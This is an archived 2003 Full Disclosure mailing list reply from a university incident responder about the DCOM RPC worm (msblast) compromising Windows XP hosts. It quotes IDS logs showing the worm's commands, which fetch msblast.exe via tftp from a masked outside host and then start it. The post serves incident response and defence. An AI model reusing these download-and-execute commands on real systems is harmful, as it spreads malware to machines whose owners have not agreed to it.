Full Disclosure mailing list archives
Re: DCOM Worm?
From: Jordan Wiens <jwiens () nersp nerdc ufl edu>
Date: Mon, 11 Aug 2003 19:29:05 -0400 (EDT)
On Mon, 11 Aug 2003, Carl Sager wrote:
Aha! The worm is using the 2k offsets and corrupts the DCOM RPC service on XP, which makes the OS automatically shut down after 1 minute. Patch up or use a firewall (or well, just tell any ignorant end users to do so) and you'll be good!
You sure about that? I'm seeing it compromise XP hosts as well. Maybe it randomly switches between offsets? In fact, IDS logs from our first compromised host: Microsoft Windows XP [Version 5.1.2600]Microsoft Windows XP [Version 5.1.2600]tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A} {D}{A} (C) Copyright 1985-2001 Microsoft Corp.{D}{A} {D}{A} C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A} {D}{A} (C) Copyright 1985-2001 Microsoft Corp.{D}{A} {D}{A} C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A} tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A} start msblast.exe{A} start msblast.exe{A} msblast.exe{A} msblast.exe{A} -- Jordan Wiens, CISSP UF Network Incident Response Team (352)392-2061 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- DCOM Worm? Carl Sager (Aug 11)
- Re: DCOM Worm? Daniel Harrison (Aug 11)
- Re: DCOM Worm? Tobias Heide (Aug 11)
- Re: DCOM Worm? morning_wood (Aug 11)
- <Possible follow-ups>
- RE: DCOM Worm? Matt Bell (Aug 11)
- DCOM Worm? Carl Sager (Aug 11)
- Re: DCOM Worm? Jordan Wiens (Aug 11)
- Re: DCOM Worm? Carl Sager (Aug 11)
- Re: DCOM Worm? Jordan Wiens (Aug 11)
- RE: DCOM Worm? p00lshark (Aug 11)
- Re: DCOM Worm? Daniel Harrison (Aug 11)